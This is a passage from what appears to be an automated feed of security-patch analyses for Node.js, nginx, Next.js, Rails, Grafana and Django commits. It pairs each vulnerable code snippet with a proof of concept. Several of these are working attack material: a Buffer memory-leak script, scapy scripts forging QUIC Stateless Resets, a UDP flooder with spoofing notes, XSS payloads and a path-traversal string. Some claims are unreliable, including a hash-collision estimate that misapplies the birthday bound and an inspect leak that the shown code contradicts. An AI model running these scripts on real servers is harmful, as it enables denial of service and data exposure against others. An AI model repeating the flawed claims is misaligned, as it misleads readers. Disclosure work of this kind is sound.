Feb 27, 2026, 06:36 PM — nodejs/node

Commit: cc6c188

Author: Mert Can Altin

Before the patch, Buffer.concat() computed the total allocation size using the user-controllable `.length` property of each element, then allocated with `Buffer.allocUnsafe(length)`. For typed arrays, an attacker could spoof a larger `.length` via a getter, causing an oversized uninitialized Buffer to be returned, leaking process memory contents. The patch fixes this by using the typed array’s intrinsic byte length (`TypedArrayPrototypeGetByteLength`) and by allocating via `allocate` plus explicit zero-filling of any slack.

🔍 View Affected Code & PoC

Affected Code

for (let i = 0; i < list.length; i++) {
  if (list[i].length) {
    length += list[i].length;
  }
}
const buffer = Buffer.allocUnsafe(length);

Proof of Concept

/* Run on a Node version before cc6c18802dc6dfc041f359bb417187a7466e9e8f */

// Attacker-controlled Uint8Array with spoofed .length getter inflates allocation size.
const u8_1 = new Uint8Array([1, 2, 3, 4]);
const u8_2 = new Uint8Array([5, 6, 7, 8]);
Object.defineProperty(u8_1, 'length', { get() { return 1024 * 1024; } }); // 1MB

const b = Buffer.concat([u8_1, u8_2]);
console.log('returned length:', b.length); // BEFORE PATCH: 1048576 + 8 (or similar huge value)

// Only first 8 bytes are controlled; the rest is uninitialized heap data.
// Demonstrate leak by showing non-zero/unexpected bytes in the tail.
let leaked = 0;
for (let i = 8; i < b.length; i++) {
  if (b[i] !== 0) { leaked++; if (leaked > 32) break; }
}
console.log('non-zero bytes after concatenated data (leak indicator):', leaked);

// Print a slice of leaked memory.
console.log('tail sample:', b.subarray(8, 8 + 64));
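The patched sizing logic can be sketched as follows (`safeConcat` is a stand-in, not Node's internal code): read `byteLength` through the `%TypedArray%.prototype` getter, which an own-property getter on the chunk cannot shadow, and use a zero-filled allocation so slack bytes can never expose heap memory:

```javascript
// The intrinsic byteLength getter from %TypedArray%.prototype cannot be
// spoofed by defining an own 'length' or 'byteLength' property on the chunk.
const getByteLength = Object.getOwnPropertyDescriptor(
  Object.getPrototypeOf(Uint8Array.prototype), 'byteLength').get;

function safeConcat(list) {
  let total = 0;
  for (const chunk of list) total += getByteLength.call(chunk);
  const out = Buffer.alloc(total); // zero-filled
  let offset = 0;
  for (const chunk of list) {
    out.set(chunk, offset); // set() reads the source's internal length slot
    offset += getByteLength.call(chunk);
  }
  return out;
}
```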

🔥 HIGH UNVERIFIED Improper Authentication / Cryptographic Token Misbinding (QUIC Stateless Reset token exposure leading to DoS)

Feb 26, 2026, 02:36 PM — nginx/nginx

Commit: f72c745

Author: Roman Arutyunyan

Before the patch, the QUIC stateless reset token was derived only from a shared secret and the connection ID, making the token identical across workers. In a multi-worker configuration with packet steering, an attacker could intentionally route a victim connection's packet to a different worker to trigger emission/observation of the stateless reset token, then forge a QUIC Stateless Reset to immediately terminate the victim connection (remote DoS). The patch binds the derived token to the worker number by incorporating ngx_worker into the KDF input, making tokens differ per worker and preventing cross-worker token acquisition/abuse.

🔍 View Affected Code & PoC

Affected Code

tmp.data = secret;
tmp.len = NGX_QUIC_SR_KEY_LEN;

if (ngx_quic_derive_key(c->log, "sr_token_key", &tmp, cid, token,
                        NGX_QUIC_SR_TOKEN_LEN) != NGX_OK) {

Proof of Concept

Prereqs: nginx built with QUIC, configured with multiple workers (e.g., worker_processes 4;), and client behind NAT or attacker can spoof/own a 5-tuple to influence RSS/ECMP so packets land on different workers.

1) Establish a QUIC connection from victim client (or attacker-controlled client) to nginx and note the server-chosen DCID used in 1-RTT packets.

2) Force a packet for that existing connection to be processed by the "wrong" worker (e.g., by changing UDP source port so Linux RSS hashes to another receive queue/worker while keeping the same QUIC DCID):
   # pseudo: send a 1-RTT packet with same DCID but altered UDP 5-tuple
   python3 - <<'PY'
from scapy.all import *
# Requires QUIC packet crafting; below is schematic.
SERVER_IP='1.2.3.4'
SERVER_PORT=443
SRC_IP='victim-or-attacker-ip'
NEW_SPORT=40000  # choose to steer to different worker via RSS hash
DCID=bytes.fromhex('00112233445566778899aabbccddeeff')  # observed DCID
# payload must be a syntactically valid short-header 1-RTT QUIC packet for that DCID
quic_pkt = b'\x40' + DCID + b'\x00'*32
send(IP(src=SRC_IP,dst=SERVER_IP)/UDP(sport=NEW_SPORT,dport=SERVER_PORT)/Raw(load=quic_pkt), verbose=False)
PY

3) Observe that nginx responds with a QUIC Stateless Reset on that 5-tuple. Capture it with tcpdump:
   sudo tcpdump -ni any udp port 443 -vv -X
   The Stateless Reset contains a 16-byte token at the end of the UDP payload.

4) Use the captured token to kill the real connection: send a forged Stateless Reset to the victim's original 5-tuple (or to the peer that will accept it), with the token at the end:
   python3 - <<'PY'
from scapy.all import *
SERVER_IP='1.2.3.4'
VICTIM_IP='victim-ip'
SPORT=443
DPORT=54321  # victim's UDP port used for the QUIC connection
TOKEN=bytes.fromhex('deadbeef'*4)  # replace with captured 16-byte token
# QUIC Stateless Reset is an unpredictable-looking packet >= 21 bytes, token must be last 16 bytes
payload = b'\x00'*32 + TOKEN
send(IP(src=SERVER_IP,dst=VICTIM_IP)/UDP(sport=SPORT,dport=DPORT)/Raw(load=payload), verbose=False)
PY

Expected result (pre-patch): the victim QUIC stack accepts the Stateless Reset and immediately closes the connection (DoS). Post-patch: token differs per worker, so a token obtained via wrong-worker routing will not validate for the victim's actual worker-path, and the forged reset is ignored.

🔥 HIGH UNVERIFIED NULL Pointer Dereference (Remote Denial of Service)

Feb 24, 2026, 01:33 AM — nginx/nginx

Commit: c67bf94

Author: user.email

Before the patch, the QUIC OpenSSL compatibility keylog callback discarded failures from ngx_quic_compat_set_encryption_secret(). Under memory pressure (allocation failure), the encryption context (secret->ctx) could remain NULL, yet ngx_quic_compat_create_record() would proceed to encrypt and dereference the NULL ctx, crashing the NGINX worker. The patch checks the return value, marks the QUIC connection as errored to fail the handshake cleanly, and adds a NULL guard in record creation to prevent the crash.

🔍 View Affected Code & PoC

Affected Code

(void) ngx_quic_compat_set_encryption_secret(c, &com->keys, level,
                                             cipher, secret, n);
...
secret = &rec->keys->secret;
ngx_memcpy(nonce, secret->iv.data, secret->iv.len);
/* later: encrypt using secret->ctx (could be NULL) */

Proof of Concept

# PoC: remote crash via QUIC handshake while forcing allocation failure (OOM)
# This demonstrates an exploitable, remotely triggerable DoS when QUIC is enabled
# and the worker runs out of memory during the TLS keylog callback.

# 1) Run nginx with QUIC enabled (HTTP/3) in a memory-cgroup limited container.
# Example docker run limiting memory so malloc failures occur during handshake:
#   docker run --rm -it --memory=64m --pids-limit=256 -p 443:443/udp nginx:quic
# (Use an nginx build/config that enables QUIC and listens on 443 quic.)

# 2) From another host, flood with QUIC handshakes to increase memory pressure:
# Using ngtcp2's client to rapidly initiate TLS/QUIC handshakes:
for i in $(seq 1 2000); do
  ngtcp2-client --exit-on-all-streams-close --timeout=1 127.0.0.1 443 >/dev/null 2>&1 &
done
wait

# Expected behavior BEFORE patch:
# - Under memory pressure, ngx_quic_compat_set_encryption_secret() can fail,
#   leaving secret->ctx NULL.
# - A subsequent CRYPTO record creation attempts to encrypt using NULL ctx,
#   leading to SIGSEGV and worker process crash (remote DoS).
#   (In logs/dmesg you'll see a segfault in the worker.)

# Expected behavior AFTER patch:
# - Handshake fails with internal error; worker does not crash.

🔥 HIGH UNVERIFIED Sensitive Data Exposure (Secrets persisted to cache)

Feb 26, 2026, 02:11 PM — vercel/next.js

Commit: 2307bf6

Author: Tobias Koppers

Before the patch, `ProcessEnv::read_all()` returned a serializable `EnvMap`, which could be automatically persisted into Turbopack/Next.js' on-disk persistent cache. This meant any process environment variable (including secrets like API keys and tokens) could be written to disk and later recovered by anyone with read access to the cache directory (e.g., another local user, CI artifact consumers, or a compromised build agent). The patch introduces `TransientEnvMap` with `serialization = "none"` and changes `read_all()` to return it, preventing env vars from being persisted and forcing them to be re-read from the process environment after cache restore.

🔍 View Affected Code & PoC

Affected Code

/// Reads all env variables into a Map
#[turbo_tasks::function]
fn read_all(self: Vc<Self>) -> Vc<EnvMap>;

// e.g.
Vc::cell(env_snapshot())

Proof of Concept

Prereq: a Next.js/Turbopack project using persistent caching (default local cache dir).

1) Run a build with a secret in the environment so it gets captured by `read_all()`:

   $ export AWS_SECRET_ACCESS_KEY='POC_SUPER_SECRET_123'
   $ export NEXT_TELEMETRY_DISABLED=1
   $ next dev   # or a turbopack-enabled build that populates the persistent cache

2) Search the on-disk cache for the secret (the exact path can vary by platform, but typically under the project’s .next cache or Turbopack cache directory):

   $ rg -n "POC_SUPER_SECRET_123" .next/ 2>/dev/null || true
   $ rg -n "POC_SUPER_SECRET_123" .turbo/ 2>/dev/null || true
   $ rg -n "POC_SUPER_SECRET_123" . 2>/dev/null | head

Expected vulnerable behavior (before patch): the secret string is found in one or more cache files because `EnvMap` was auto-serialized.

Impact demonstration: any actor who can read that cache directory (e.g., another user on the machine, or someone who downloads CI cache artifacts) can recover `AWS_SECRET_ACCESS_KEY` by grepping the cache.
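The failure mode generalizes: any cache layer that serializes a snapshot of the process environment writes secrets to disk verbatim. A minimal sketch with a hypothetical JSON cache (not Turbopack's actual format), where marking entries transient plays the role of `serialization = "none"`:

```python
import json
import os
import tempfile

SECRET = "POC_SUPER_SECRET_123"

def persist_cache(entries: dict, path: str, transient_keys=()) -> None:
    # Stand-in for any serializing persistent cache. Pre-patch behavior:
    # every entry is written to disk verbatim. The patched analogue marks
    # env entries transient so they are skipped and must be re-read from
    # the live environment after a cache restore.
    data = {k: v for k, v in entries.items() if k not in transient_keys}
    with open(path, "w") as f:
        json.dump(data, f)

env = {"AWS_SECRET_ACCESS_KEY": SECRET, "PATH": "/usr/bin"}
cache_dir = tempfile.mkdtemp()

persist_cache(env, os.path.join(cache_dir, "pre.json"))                       # vulnerable
persist_cache(env, os.path.join(cache_dir, "post.json"), transient_keys=env)  # patched analogue

leak_pre = SECRET in open(os.path.join(cache_dir, "pre.json")).read()
leak_post = SECRET in open(os.path.join(cache_dir, "post.json")).read()
```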

⚠️ MEDIUM UNVERIFIED Denial of Service (DoS) / Amplification via Stateless Reset flooding

Feb 25, 2026, 05:09 PM — nginx/nginx

Commit: e6ffe83

Author: Sergey Kandaurov

Before the patch, nginx would generate and send a QUIC Stateless Reset for every incoming packet that triggered the stateless reset path, with no per-source rate limiting. An attacker could spoof many UDP packets (often with spoofed source IPs) to force the server to spend CPU on hashing/random generation and to emit many Stateless Reset packets, creating resource exhaustion and reflected traffic. The patch adds a per-second Bloom-filter-based limiter keyed by source address so repeated triggers from the same address are declined.

🔍 View Affected Code & PoC

Affected Code

ngx_int_t
ngx_quic_send_stateless_reset(ngx_connection_t *c, ngx_quic_conf_t *conf,
    ngx_quic_header_t *pkt)
{
    ...
    if (pkt->len <= NGX_QUIC_MIN_SR_PACKET) {
        len = pkt->len - 1;
    ...
    return ngx_quic_send(c, buf, len, c->sockaddr, c->socklen);
}

Proof of Concept

Prereq: QUIC enabled on nginx (listen ... quic).

1) Flood the server with UDP datagrams that look like short-header QUIC packets with a random DCID, causing nginx to respond with Stateless Reset repeatedly.

Example Python flooder (sends many packets; if you can spoof, set a victim IP as source to demonstrate reflection):

`​`​`​python
import os, socket, time

target_ip = "NGINX_IP"
target_port = 443  # QUIC port

s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)

# QUIC short header first byte: 0b010xxxxx (0x40..0x7f). Use 0x40.
# Fill rest with random bytes to simulate unknown connection id etc.
pkt_len = 1200
payload = bytes([0x40]) + os.urandom(pkt_len - 1)

end = time.time() + 10
while time.time() < end:
    s.sendto(payload, (target_ip, target_port))
`​`​`​

Expected behavior BEFORE patch: server emits a Stateless Reset for essentially every received datagram (observable with tcpdump on server: `udp and port 443` showing many outgoing packets) and CPU/network usage increases proportionally to attack rate.

Expected behavior AFTER patch: for a given source address, after the first reset in a 1-second window, subsequent reset attempts are mostly dropped (function returns NGX_DECLINED), significantly reducing outgoing packets and server work per attacker address.

If spoofing is available (raw sockets), repeat with varying spoofed source IPs to demonstrate reflection potential; without spoofing, the same script still demonstrates server-side CPU/network DoS from a single host.
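The limiter's shape can be sketched: a small Bloom filter, cleared every second, keyed by source address, so the first reset per address in a window is sent and repeats are declined. A Python sketch of the approach (filter size and hash choices are illustrative, not nginx's):

```python
import hashlib
import time

class ResetRateLimiter:
    """Allow at most one stateless reset per source address per second,
    using a Bloom filter cleared each second. A sketch of the approach;
    nginx's sizes and hash functions differ."""

    def __init__(self, bits=1024, hashes=3):
        self.bits, self.hashes = bits, hashes
        self.filter = 0       # bit set stored as one big int
        self.window = None    # the 1-second window currently covered

    def _positions(self, addr):
        for i in range(self.hashes):
            h = hashlib.sha256(b"%d|" % i + addr.encode()).digest()
            yield int.from_bytes(h[:4], "big") % self.bits

    def allow(self, addr, now=None):
        now = int(now if now is not None else time.time())
        if now != self.window:            # new window: clear the filter
            self.window, self.filter = now, 0
        mask = 0
        for p in self._positions(addr):
            mask |= 1 << p
        if self.filter & mask == mask:    # probably seen already: decline
            return False
        self.filter |= mask
        return True
```

Like nginx's version, this trades a small false-positive rate (occasionally declining a first-time source) for O(1) memory under spoofed-source floods.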

⚠️ MEDIUM CONFIRMED Cross-Site Scripting (XSS)

Feb 24, 2026, 08:56 PM — rails/rails

Commit: e905b2e

Author: Mike Dalessio

The markdown conversion functionality was vulnerable to XSS attacks through malicious javascript: URLs that could bypass protocol filtering using obfuscation techniques like leading whitespace, HTML entity encoding, or case variations. The patch fixes this by delegating URI validation to Rails::HTML::Sanitizer.allowed_uri? which properly handles these bypass attempts.

🔍 View Affected Code & PoC

Affected Code

if (href = node["href"]) && allowed_href_protocol?(href)
  "[#{inner}](#{href})"
else
  inner
end

Proof of Concept

<a href=" javascript:alert('XSS')">Click me</a> or <a href="&#106;avascript:alert('XSS')">Click me</a> - these would be converted to markdown links that execute JavaScript when clicked, bypassing the original protocol validation
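All three bypass classes fall to the same normalization: decode entities, drop the whitespace and control characters browsers ignore, then compare the scheme case-insensitively — essentially what delegating to Rails::HTML::Sanitizer.allowed_uri? buys. A Python sketch of such a check (the allowlist is illustrative):

```python
import html
from urllib.parse import urlparse

ALLOWED_SCHEMES = {"http", "https", "mailto", ""}  # "" covers relative URLs

def allowed_href(href: str) -> bool:
    # 1. Decode HTML entities: "&#106;avascript:" -> "javascript:"
    decoded = html.unescape(href)
    # 2. Drop control chars and whitespace browsers ignore inside URLs,
    #    defeating " javascript:" and "java\tscript:" obfuscation.
    cleaned = "".join(c for c in decoded if ord(c) > 0x20)
    # 3. Compare the scheme case-insensitively against the allowlist.
    return urlparse(cleaned).scheme.lower() in ALLOWED_SCHEMES
```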

🔥 HIGH UNVERIFIED Authentication Bypass

Feb 24, 2026, 08:05 PM — grafana/grafana

Commit: f1b77b8

Author: colin-stuart

The code allowed SAML authentication to create duplicate user_auth records for SCIM-provisioned users instead of updating existing ones. An attacker could exploit this by logging in via SAML with a SCIM user's credentials to create a new auth record with their own AuthID, potentially bypassing access controls or creating authentication confusion.

🔍 View Affected Code & PoC

Affected Code

if identity.AuthenticatedBy == login.GenericOAuthModule {
    query := &login.GetAuthInfoQuery{AuthModule: identity.AuthenticatedBy, UserId: usr.ID}
    userAuth, err = s.authInfoService.GetAuthInfo(ctx, query)

Proof of Concept

1. SCIM provisions user with email '[email protected]' and creates user_auth record with empty AuthID
2. Attacker performs SAML login with same email '[email protected]' but different AuthID 'attacker-saml-id' 
3. Code fails to find existing auth record by AuthID lookup, creates new user_auth record instead of updating existing one
4. Result: User now has two authentication methods - original SCIM provision + attacker's SAML AuthID, allowing potential unauthorized access

🔥 HIGH CONFIRMED Null Pointer Dereference

Feb 24, 2026, 07:51 PM — nodejs/node

Commit: 84d1e6c

Author: Nora Dossche

The code failed to check whether BIO_meth_new() returned NULL before passing the result to the BIO_meth_set_* functions, so an allocation failure leads straight to a null pointer dereference. This could crash the application and cause denial of service when SSL/TLS operations are initiated under memory pressure.

🔍 View Affected Code & PoC

Affected Code

BIO_METHOD* method = BIO_meth_new(BIO_TYPE_MEM, "node.js SSL buffer");
BIO_meth_set_write(method, Write);

Proof of Concept

Trigger memory exhaustion by creating many large objects, then initiate SSL/TLS connection which calls NodeBIO::GetMethod(). When BIO_meth_new() fails and returns NULL due to memory pressure, the subsequent BIO_meth_set_write(NULL, Write) call will dereference NULL pointer causing segmentation fault and application crash.

⚠️ MEDIUM UNVERIFIED Regular Expression Denial of Service (ReDoS)

Feb 24, 2026, 06:11 PM — nodejs/node

Commit: ec33dd9

Author: Node.js GitHub Bot

The minimatch library had a vulnerability where multiple consecutive asterisks (*) in glob patterns could cause exponential backtracking in the generated regular expression, leading to CPU exhaustion. The patch fixes this by coalescing multiple stars into a single star pattern, preventing the ReDoS condition.

🔍 View Affected Code & PoC

Affected Code

if (c === '*') {
  re += noEmpty && glob === '*' ? starNoEmpty : star;
  hasMagic = true;
  continue;
}

Proof of Concept

const { minimatch } = require('minimatch');
// This would cause exponential backtracking and hang the process
minimatch('a'.repeat(50), '*'.repeat(50) + 'x');
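The fix's star-coalescing step can be sketched outside JavaScript: collapse runs of `*` before generating the regex, so the result has one backtracking point instead of fifty. A simplified glob translator (my own sketch, not minimatch's actual logic):

```python
import re

def glob_to_regex(pattern: str, coalesce: bool = True) -> str:
    # With coalesce=True (the fix), runs of '*' collapse to a single star
    # before translation; with coalesce=False (pre-patch behavior), each
    # '*' becomes its own '(?:.*)' group, stacking backtracking points.
    if coalesce:
        pattern = re.sub(r"\*+", "*", pattern)
    out = []
    for c in pattern:
        out.append("(?:.*)" if c == "*" else re.escape(c))
    return "^" + "".join(out) + "$"

fixed = glob_to_regex("*" * 50 + "x")                   # one star survives
naive = glob_to_regex("*" * 50 + "x", coalesce=False)   # 50 nested groups
```

Matching `naive` against a long non-matching input exhibits the exponential backtracking; `fixed` rejects it immediately.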

⚠️ MEDIUM UNVERIFIED Man-in-the-Middle Attack / Insufficient Certificate Validation

Feb 24, 2026, 09:32 AM — grafana/grafana

Commit: f13db65

Author: Maksym Revutskyi

The code before the patch used HTTP transport without proper TLS certificate validation when communicating with external image renderer services. This allowed attackers to intercept HTTPS communications through man-in-the-middle attacks, potentially exposing authentication tokens and sensitive data. The patch adds support for custom CA certificates to enable proper certificate validation.

🔍 View Affected Code & PoC

Affected Code

var netTransport = &http.Transport{
	Proxy: http.ProxyFromEnvironment,
	Dial: (&net.Dialer{
		Timeout: 30 * time.Second,
	}).Dial,
	TLSHandshakeTimeout: 5 * time.Second,
}

Proof of Concept

1. Set up a malicious proxy/MITM tool like mitmproxy with a self-signed certificate
2. Configure network to route Grafana's image renderer traffic through the proxy
3. The original code would accept any certificate without validation, allowing interception of requests containing X-Auth-Token headers
4. Command: `mitmproxy -p 8080 --certs *=cert.pem` then configure Grafana to use renderer at https://malicious-renderer:8081 - the auth tokens would be captured in plaintext

⚠️ MEDIUM UNVERIFIED Information Disclosure

Feb 11, 2026, 10:22 PM — rails/rails

Commit: 4c07766

Author: Mark Bastawros

The custom inspect methods in various Rails classes could potentially expose sensitive internal state or configuration data through debug output, error messages, or logs. The patch replaces these with a controlled inspection mechanism that only shows explicitly whitelisted instance variables.

🔍 View Affected Code & PoC

Affected Code

def inspect # :nodoc:
  "#<#{self.class.name}:#{'%#016x' % (object_id << 1)}>"
end

Proof of Concept

# In a Rails console or error handler:
connection = ActionCable::Connection::Base.new(server, env)
connection.instance_variable_set(:@secret_token, 'sensitive_data')
puts connection.inspect
# Before patch: Could expose @secret_token and other internals
# After patch: Only shows basic object info without sensitive variables

⚠️ MEDIUM UNVERIFIED Information Disclosure

Feb 24, 2026, 09:19 AM — rails/rails

Commit: 5086622

Author: Jean Boussier

The custom inspect methods in various Rails classes exposed sensitive internal state including cryptographic keys, secrets, and other confidential data in debug output, logs, and error messages. The patch replaces custom inspect methods with a standardized approach that only shows safe instance variables, preventing accidental leakage of sensitive information.

🔍 View Affected Code & PoC

Affected Code

def inspect # :nodoc:
  "#<#{self.class.name}:#{'%#016x' % (object_id << 1)}>"
end

Proof of Concept

# In a Rails console or debug session:
encryptor = ActiveSupport::MessageEncryptor.new(SecretKey.new)
encryptor.inspect
# Before patch: Would expose the secret key in the output
# After patch: Only shows class name and object ID

# Or in ActionCable connection:
connection = ActionCable::Connection::Base.new(server, env)
connection.inspect
# Before patch: Could expose connection secrets, tokens, or session data
# After patch: Only shows safe, filtered instance variables
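The allowlisting strategy carries over to any language. A Python analogue of the patched approach (names are mine, not Rails'): only explicitly declared attributes appear in the debug representation.

```python
class SafeReprMixin:
    """Only expose explicitly allowlisted attributes in repr(), the
    strategy the Rails patch applies to #inspect (a Python analogue)."""

    _repr_attrs = ()  # subclasses opt attributes in explicitly

    def __repr__(self):
        parts = [type(self).__name__]
        parts += [f"{a}={getattr(self, a)!r}" for a in self._repr_attrs]
        return "<%s>" % " ".join(parts)

class Encryptor(SafeReprMixin):
    _repr_attrs = ("purpose",)   # @secret is deliberately absent

    def __init__(self, secret, purpose):
        self.secret = secret     # never shown in repr()
        self.purpose = purpose

shown = repr(Encryptor("s3cr3t-key", "cookies"))
```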

⚠️ MEDIUM UNVERIFIED Race Condition

Feb 23, 2026, 04:36 PM — vercel/next.js

Commit: 45a8a82

Author: Tobias Koppers

The code had a concurrency bug where the follower's aggregation number was read without proper locking, allowing the inner-vs-follower classification decision to be made on stale data if the aggregation number changed concurrently. This could lead to incorrect task classification and potential data corruption in the aggregation system.

🔍 View Affected Code & PoC

Affected Code

let follower_aggregation_number = get_aggregation_number(&follower);
let should_be_follower = follower_aggregation_number < upper_aggregation_number;

Proof of Concept

Thread 1 reads follower's aggregation number (e.g., 10) and determines it should be a follower. Thread 2 concurrently updates the same follower's aggregation number to a higher value (e.g., 20). Thread 1 proceeds with the stale classification decision, incorrectly treating a node that should be an inner node as a follower, leading to incorrect aggregation graph structure and potential data corruption.

⚠️ MEDIUM UNVERIFIED Open Redirect

Feb 23, 2026, 10:14 AM — grafana/grafana

Commit: e8a2b4b

Author: xavi

The ValidateRedirectTo function was vulnerable to open redirect attacks through URL fragments. Attackers could bypass path validation by using URL fragments containing dangerous patterns like '../' or '//', which were not sanitized before the redirect. The patch fixes this by validating fragments and returning a sanitized URL string instead of the original user input.

🔍 View Affected Code & PoC

Affected Code

if redirectDenyRe.MatchString(to.Path) {
	return errForbiddenRedirectTo
}
// Fragment validation was missing
return redirectTo // Original unsanitized input returned

Proof of Concept

POST /login with redirect_to cookie set to '/dashboard#//evil.com/steal' - the fragment '#//evil.com/steal' would bypass the path validation regex and could be used in client-side JavaScript to redirect users to the malicious domain
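The patched approach — validate the fragment too, and return a rebuilt URL instead of the raw input — can be sketched as follows (deny patterns are illustrative, not Grafana's exact regex):

```python
from urllib.parse import urlparse

DENY = ("//", "../", "\\")

def validate_redirect_to(redirect_to: str) -> str:
    # Reject absolute URLs, check the path AND the fragment against the
    # deny patterns, and return a rebuilt URL rather than echoing the
    # raw user input back.
    u = urlparse(redirect_to)
    if u.scheme or u.netloc:
        raise ValueError("absolute redirects forbidden")
    for part in (u.path, u.fragment):
        if any(bad in part for bad in DENY):
            raise ValueError("forbidden redirect pattern")
    rebuilt = u.path
    if u.query:
        rebuilt += "?" + u.query
    if u.fragment:
        rebuilt += "#" + u.fragment
    return rebuilt
```

The PoC payload `/dashboard#//evil.com/steal` passes a path-only check (the path is just `/dashboard`) but fails once the fragment is inspected.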

🔥 HIGH UNVERIFIED Buffer Overflow/Out-of-bounds Memory Access

Feb 23, 2026, 12:45 AM — nginx/nginx

Commit: bb8ec29

Author: CodeByMoriarty

The code failed to validate that sync sample values in MP4 stss atoms are 1-based as required by ISO 14496-12. A zero-valued stss entry caused the key_prefix calculation to exceed consumed samples, leading the backward loop in ngx_http_mp4_crop_stts_data() to walk past the beginning of the stts data buffer, causing out-of-bounds memory access.

🔍 View Affected Code & PoC

Affected Code

sample = ngx_mp4_get_32value(entry);
if (sample > start_sample) {
    break;
}
key_prefix = start_sample - sample;

Proof of Concept

Craft a malicious MP4 file with an stss atom containing a zero sync sample value (0x00000000). When nginx processes this file with mp4 module enabled and start_key_frame is on, the zero sample causes key_prefix to equal start_sample + 1, which exceeds the samples processed in the forward stts pass. This triggers the backward loop in ngx_http_mp4_crop_stts_data() to read/write beyond the stts buffer boundaries, potentially leading to memory corruption or information disclosure.
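The arithmetic behind the underrun can be modeled in a few lines — a simplified Python model of the forward scan, not the C loop itself:

```python
def key_prefix_for(start_sample, stss_entries):
    # Mirrors the forward scan: find the nearest sync (key) sample at or
    # before start_sample. Sync sample numbers are 1-based per
    # ISO 14496-12, so the patched guard rejects 0 -- an unchecked 0
    # yields key_prefix == start_sample, one more than the samples the
    # forward stts pass consumed, which is what sends the backward loop
    # past the start of the stts buffer.
    key_prefix = 0
    for sample in stss_entries:
        if sample == 0:
            raise ValueError("invalid stss entry: sync samples are 1-based")
        if sample > start_sample:
            break
        key_prefix = start_sample - sample
    return key_prefix
```

With valid 1-based entries the prefix is at most `start_sample - 1`; the zero entry is the only way to exceed that bound.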

⚠️ MEDIUM UNVERIFIED Path Traversal

Feb 21, 2026, 04:06 AM — vercel/next.js

Commit: 632725b

Author: Sebastian "Sebbie" Silbermann

The script accepts user-provided file paths without validation and directly converts them to file URLs, allowing attackers to access arbitrary files on the system. The patch adds proper path handling using pathToFileURL() which normalizes paths and prevents directory traversal attacks.

🔍 View Affected Code & PoC

Affected Code

if (version !== null && version.startsWith('/')) {
    version = pathToFileURL(version).href
}

Proof of Concept

pnpm run sync-react --version "../../../etc/passwd" would allow reading system files outside the intended React checkout directory before the patch

⚠️ MEDIUM UNVERIFIED Cross-Site Scripting (XSS)

Feb 20, 2026, 02:43 PM — django/django

Commit: 283ea9e

Author: SiHyunLee

The Django admin interface was vulnerable to XSS attacks when displaying model string representations that contained only whitespace or malicious scripts. The vulnerability occurred because whitespace-only strings were not properly sanitized before being rendered in HTML contexts, allowing attackers to inject malicious scripts through model __str__ methods.

🔍 View Affected Code & PoC

Affected Code

obj_repr = format_html('<a href="{}">{}</a>', urlquote(obj_url), obj)
# Direct use of obj without sanitization

Proof of Concept

Create a Django model with a __str__ method that returns '<script>alert("XSS")</script>' or just whitespace followed by script tags. When viewing this object in the Django admin interface, the malicious script would execute in the browser due to improper escaping of the object representation in admin templates and breadcrumbs.
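The underlying rule is that object string representations must be escaped before interpolation into markup — the discipline Django's own format_html enforces. A stdlib-only Python sketch of that discipline (not Django's actual implementation):

```python
import html

def safe_link(url: str, obj) -> str:
    # Escape both the URL and the object's string form before building
    # markup, so a malicious __str__ cannot inject script tags.
    return '<a href="{}">{}</a>'.format(
        html.escape(url, quote=True),
        html.escape(str(obj)),
    )

class EvilModel:
    def __str__(self):
        return '<script>alert("XSS")</script>'

rendered = safe_link("/admin/app/evil/1/", EvilModel())
```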

🔥 HIGH UNVERIFIED Authorization Bypass

Feb 20, 2026, 08:25 AM — grafana/grafana

Commit: 430abe7

Author: Georges Chaudy

The old authorization system used deprecated Compile method which performed authorization checks item-by-item during iteration, potentially allowing unauthorized access to resources due to race conditions or incomplete authorization state. The patch replaces this with FilterAuthorized using BatchCheck which performs more robust batch authorization before returning results.

🔍 View Affected Code & PoC

Affected Code

checker, _, err := s.access.Compile(ctx, user, claims.ListRequest{
	Group: key.Group,
	Resource: key.Resource,
	Namespace: key.Namespace,
	Verb: utils.VerbGet,
})

Proof of Concept

1. User with limited permissions makes concurrent List requests for resources they shouldn't access
2. During the item-by-item authorization check in the old code, if authorization state changes between checks or there's a race condition, some unauthorized items could pass through the checker
3. Attacker could potentially access resources in folders/namespaces they don't have permissions for by exploiting timing windows in the deprecated Compile authorization flow

⚠️ MEDIUM UNVERIFIED Stack Overflow DoS

Feb 20, 2026, 04:48 AM — vercel/next.js

Commit: ca0957d

Author: Josh Story

The unhandled rejection filter module was being bundled twice, causing mutual recursion when handling unhandled Promise rejections. Each instance captured the other's handler, creating an infinite loop that would overflow the stack and crash the server on any unhandled rejection.

🔍 View Affected Code & PoC

Affected Code

function filteringUnhandledRejectionHandler(reason, promise) {
  // Handler gets called recursively between two instances
  // No guards to prevent infinite recursion
}

Proof of Concept

// Trigger an unhandled Promise rejection in a Next.js server with the vulnerable setup
Promise.reject(new Error('test rejection'));
// This would cause infinite recursion between the two installed handlers,
// eventually overflowing the call stack and crashing the Node.js process

⚠️ MEDIUM CONFIRMED Hash Collision

Feb 19, 2026, 06:22 PM — grafana/grafana

Commit: 6d3440a

Author: beejeebus

The code truncated SHA-256 hashes to only 10 hex characters (40 bits) when generating secret names, raising the collision probability from negligible to roughly 1 in 16^10 per guess — which, by the birthday bound, means a collision between attacker-chosen names is expected after only about 2^20 (~1 million) attempts. This allows attackers to craft field names that collide with existing secret field names, potentially accessing or modifying secrets they shouldn't have access to.

🔍 View Affected Code & PoC

Affected Code

h := sha256.New()
h.Write([]byte(dsUID))
h.Write([]byte("|"))
h.Write([]byte(key))
n := hex.EncodeToString(h.Sum(nil))
return apistore.LEGACY_DATASOURCE_SECURE_VALUE_NAME_PREFIX + n[0:10]

Proof of Concept

1. Target existing secret with field name 'password' for dsUID 'abc123' (generates truncated hash like 'lds-sv-0d27eff323')
2. Craft malicious field name by brute-forcing inputs until finding one that produces same 10-character prefix
3. With ~1.1M attempts, find collision like field name 'malicious_field_xyz' that also produces 'lds-sv-0d27eff323'
4. Create datasource with the colliding field name to access/overwrite the legitimate 'password' secret
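The cost of the truncation is easy to demonstrate at smaller scale. The sketch below reproduces the derivation and brute-forces a collision at 4 hex characters (16 bits, ~2^16 hashes, well under a second); the comments extrapolate to the vulnerable 10-character case:

```python
import hashlib

PREFIX = "lds-sv-"

def secret_name(ds_uid: str, key: str, hexlen: int) -> str:
    # Mirrors the vulnerable derivation: sha256(dsUID|key), hex, truncated.
    h = hashlib.sha256(f"{ds_uid}|{key}".encode()).hexdigest()
    return PREFIX + h[:hexlen]

def find_colliding_field(ds_uid: str, target_key: str, hexlen: int) -> str:
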